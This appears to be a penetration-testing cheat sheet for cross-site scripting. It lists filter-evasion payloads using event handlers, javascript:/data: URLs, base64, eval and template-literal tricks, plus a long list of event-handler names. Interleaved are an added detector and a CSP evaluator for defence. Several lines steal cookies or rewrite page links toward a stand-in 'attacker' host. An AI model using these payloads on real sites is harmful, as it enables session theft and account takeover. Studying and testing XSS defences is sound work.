- script tags
- attributes with event handler value (onload, onerror, ...)
  - 2.1. some here
  - 2.2. to discover others: search for the events the app accepts (use the event list below) and try to turn one into an XSS
  - 2.3. ``alert(1) == location=window.atob`amF2YXNjcmlwdDphbGVydCgxKQoK` ``
- attributes with URL value
  - 3.1. embed/src, iframe/src, object/data, a/href, button/formaction, form/action; more in https://www.w3.org/TR/2017/REC-html52-20171214/fullindex.html#attributes-table
  - 3.2. `javascript:alert(1)` =~ `data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==`
- some characters that separate attributes: %09 %0a %0c %0d %20 %2f
- use a separator character

```html
<imgonerror='alert(1)'src
<iframe/src=javascript:alert(1)
```
- HTML-encode inside attribute values
- use eval
- use base64
- use grave accents (template literal call) to avoid parentheses

```html
<img/src/
<img onerror=alert(cookie) src
<img onerror=eval.call`${`alert\x281\u0029`}` src>
<svg onload=location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<svg/'https://attacker/1.js'>
<xss style="opacity:0;position:fixed;font-size:999px;top:0;left:0;" onpointerover="alert(1)">test</xss>
<embed src=javascript:location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<script>location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>eval.call`${'alert\x28document.cookie\x29'}`</script>
<script>x=new DOMMatrix;matrix=alert;x.a=1;location='javascript'+':'+x</script>
```
- put `<` `>` `"` with a separator character inside the tag

```html
<svg </onload=alert(1)"
<!-- onerror --> <img onerror=alert(1) src
<!-- onfocus --> <input/autofocus/ >
<!-- onload --> <svg onload=alert(1)>
<!-- onloadstart --> <audio/src/ >
<!-- onmouseover --> <newtag style=font-size:900px onmouseover=alert(1)>explosion
<!-- onpointerover --> <xsstag style=font-size:900px onpointerover=alert(1)>explosion
```
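The two attribute-based families above (on* handler attributes, and URL-valued attributes carrying a script scheme) can be spotted by a detector that tokenizes the way a browser does. The following is an added example, not code from the original cheat sheet: it splits attributes on the same separator characters listed above (%09 %0a %0c %0d %20 %2f), normalizes attribute URLs (entity decoding, stripping of tab/LF/CR and edge controls) before reading the scheme, and runs over samples taken from this page. The tag and attribute sets, the lenient entity table and the media-tag exemption are my own choices, not part of any library or standard.

```javascript
// Added example (not from the original cheat sheet): detector for on* handler
// attributes and javascript:/vbscript:/data: URL attributes in an HTML fragment.

const SEPARATORS = new Set(['\t', '\n', '\f', '\r', ' ', '/']); // ends tag/attribute names
const WHITESPACE = new Set(['\t', '\n', '\f', '\r', ' ']);      // ends unquoted values
// URL-valued attributes from section 3.1, plus src/href in general (assumed set).
const URL_ATTRS = new Set(['src', 'href', 'data', 'action', 'formaction', 'xlink:href']);
const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);
// Tags where a data: URL only loads media, not a nested document or script (assumed set).
const MEDIA_TAGS = new Set(['img', 'picture', 'source', 'video', 'audio', 'track']);
// A few entities that can hide a scheme; deliberately matched case-insensitively (lenient).
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n', colon: ':' };

function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const v = NAMED_ENTITIES[body.toLowerCase()];
    return v === undefined ? match : v;
  });
}

// Scheme as the URL parser sees it: leading/trailing C0 controls and spaces
// stripped, tab/LF/CR removed anywhere, then lowercased. null = relative URL.
function urlScheme(value) {
  const v = decodeEntities(value).replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v);
  return m ? m[1].toLowerCase() : null;
}

// Minimal HTML tag tokenizer: returns [{ name, attrs: [{ name, value|null }] }].
function tokenizeTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<' || !/[a-z]/i.test(html[i + 1] || '')) { i++; continue; }
    i++;
    let name = '';
    while (i < html.length && !SEPARATORS.has(html[i]) && html[i] !== '>') name += html[i++];
    const attrs = [];
    while (i < html.length && html[i] !== '>') {
      if (SEPARATORS.has(html[i])) { i++; continue; }
      let attr = '';
      while (i < html.length && !SEPARATORS.has(html[i]) && html[i] !== '=' && html[i] !== '>') attr += html[i++];
      let value = null;
      if (html[i] === '=') {
        i++;
        while (i < html.length && WHITESPACE.has(html[i])) i++;
        const q = html[i];
        value = '';
        if (q === '"' || q === "'") {
          i++;
          while (i < html.length && html[i] !== q) value += html[i++];
          i++;
        } else {
          while (i < html.length && !WHITESPACE.has(html[i]) && html[i] !== '>') value += html[i++];
        }
      }
      if (attr) attrs.push({ name: attr.toLowerCase(), value });
    }
    tags.push({ name: name.toLowerCase(), attrs });
    i++;
  }
  return tags;
}

// Findings: [{ tag, attr, reason }]. Note that "<imgonerror=..." without a
// separator yields one long tag name and no attributes, so it is not flagged.
function findInjectionVectors(html) {
  const findings = [];
  for (const tag of tokenizeTags(html)) {
    for (const { name, value } of tag.attrs) {
      if (name.length > 2 && name.startsWith('on')) {
        findings.push({ tag: tag.name, attr: name, reason: 'event handler attribute' });
      } else if (URL_ATTRS.has(name) && value !== null) {
        const scheme = urlScheme(value);
        if (scheme && SCRIPT_SCHEMES.has(scheme) && !(scheme === 'data' && MEDIA_TAGS.has(tag.name))) {
          findings.push({ tag: tag.name, attr: name, reason: `${scheme}: URL` });
        }
      }
    }
  }
  return findings;
}

// Constructed samples, taken from the vectors listed on this page.
const SAMPLES = [
  '<img onerror=alert(1) src', '<iframe/src=javascript:alert(1)', "<imgonerror='alert(1)'src",
  '<svg </onload=alert(1)"', '<a href="&#106;ava\tscript:alert(1)">x</a>',
  '<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
  '<img src="data:image/png;base64,AAAA">', '<a href="https://example.com/">ok</a>',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', JSON.stringify(findInjectionVectors(s)));
```

The detector is a triage aid for logs and WAF testing, not a sanitizer: an allowlist-based sanitizer that rebuilds markup from a real DOM parse is the right fix for untrusted HTML, and the scheme check above is what such a sanitizer should apply to every URL-valued attribute.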
- reflected to DOM-based: `eval(location.hash.slice(1))`
- steal cookie: `<img src 'http://attacker/'+cookie>`
- change page relative links: `<base href="http://attacker/">`
- bypass filters on JS keywords: rewrite the code using only `[]()!+` (http://www.jsfuck.com/)
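On the defensive side, a Content-Security-Policy decides whether the vector classes on this page run at all: inline on* handlers and `javascript:` URLs are inline script, `data:` documents in script/object contexts need a scheme source, and `<base href>` hijacking of relative links is controlled by `base-uri`. The following is an added example, not from the original cheat sheet: a small evaluator that parses a CSP header and reports which of those classes it blocks, with a weak and a hardened policy as constructed samples (the nonce value is a placeholder).

```javascript
// Added example (not from the original cheat sheet): does a CSP header block
// inline on* handlers, javascript: URLs, data: script/object sources and
// <base href> hijacking? Rules follow CSP Level 3 as I understand them.

function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored; the first occurrence wins.
    if (!directives.has(name)) directives.set(name, tokens.slice(1).map((t) => t.toLowerCase()));
  }
  return directives;
}

// Effective source list, or null when the resource type is not governed at all.
function sources(directives, name, fallback) {
  if (directives.has(name)) return directives.get(name);
  if (fallback && directives.has(fallback)) return directives.get(fallback);
  return null;
}

function evaluateCsp(header) {
  const d = parseCsp(header);
  const script = sources(d, 'script-src', 'default-src');
  const object = sources(d, 'object-src', 'default-src');
  const base = sources(d, 'base-uri', null); // base-uri has no default-src fallback
  const s = script || [];
  // A nonce/hash source or 'strict-dynamic' makes 'unsafe-inline' ignored.
  const nonceHashOrStrict = s.some((x) => /^'(nonce-|sha(256|384|512)-|strict-dynamic')/.test(x));
  const unsafeInline = s.includes("'unsafe-inline'") && !nonceHashOrStrict;
  // '*' and scheme-only http:/https: let an injected <base> point anywhere.
  const openHosts = (list) => list.some((x) => x === '*' || x === 'http:' || x === 'https:');
  return {
    scriptGoverned: script !== null,
    // on* attributes are inline script; nonces do not apply to them and
    // 'unsafe-hashes' only admits handlers whose hash is listed.
    inlineHandlersBlocked: script !== null && !unsafeInline,
    // javascript: navigation is treated as inline script as well.
    javascriptUrlsBlocked: script !== null && !unsafeInline,
    // '*' does not match data:; the scheme must be listed explicitly.
    dataScriptBlocked: script !== null && !s.includes('data:'),
    objectDataBlocked: object !== null && !object.includes('data:'),
    baseHijackBlocked: base !== null && !openHosts(base),
  };
}

// Constructed sample policies (the nonce is a placeholder value).
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline'";
const STRONG_CSP = "default-src 'self'; script-src 'nonce-PLACEHOLDER' 'strict-dynamic'; object-src 'none'; base-uri 'none'";
console.log('weak  ->', evaluateCsp(WEAK_CSP));
console.log('strong->', evaluateCsp(STRONG_CSP));
```

The weak policy leaves every class on this page runnable except `data:` script sources; the hardened one blocks all of them. A policy with no `script-src` and no `default-src` governs nothing, which the evaluator reports as `scriptGoverned: false`.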
- https://html.spec.whatwg.org/multipage/indices.html
- https://html.spec.whatwg.org/multipage/webappapis.html#event-handlers-on-elements,-document-objects,-and-window-objects
- https://www.w3.org/TR/2017/REC-html52-20171214/fullindex.html#attributes-table
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
- WAHH (The Web Application Hacker's Handbook), Chapter 12.
- https://github.com/s0md3v/AwesomeXSS
- https://rootsector.blogspot.com/2018/05/cross-site-scripting-xss.html
- https://portswigger.net/research/javascript-without-parentheses-using-dommatrix
- https://html5sec.org/
- https://labs.f-secure.com/blog/getting-real-with-xss/
onactivate
onafterprint
onafterscriptexecute
onanimationcancel
onanimationend
onanimationiteration
onanimationstart
onauxclick
onbeforeactivate
onbeforecopy
onbeforecut
onbeforedeactivate
onbeforepaste
onbeforeprint
onbeforescriptexecute
onbeforeunload
onbegin
onblur
onbounce
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncopy
oncut
ondblclick
ondeactivate
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onend
onended
onerror
onfinish
onfocus
onfocusin
onfocusout
onfullscreenchange
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onloadend
onloadstart
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmozfullscreenchange
onpageshow
onpaste
onpause
onplay
onplaying
onpointerdown
onpointerenter
onpointerleave
onpointermove
onpointerout
onpointerover
onpointerrawupdate
onpointerup
onpopstate
onreadystatechange
onrepeat
onreset
onresize
onscroll
onsearch
onseeked
onseeking
onselect
onstart
onsubmit
ontimeupdate
ontoggle
ontouchend
ontouchmove
ontouchstart
ontransitioncancel
ontransitionend
ontransitionrun
onunhandledrejection
onunload
onvolumechange
onwaiting
onwebkitanimationend
onwebkitanimationstart
onwebkittransitionend
onwheel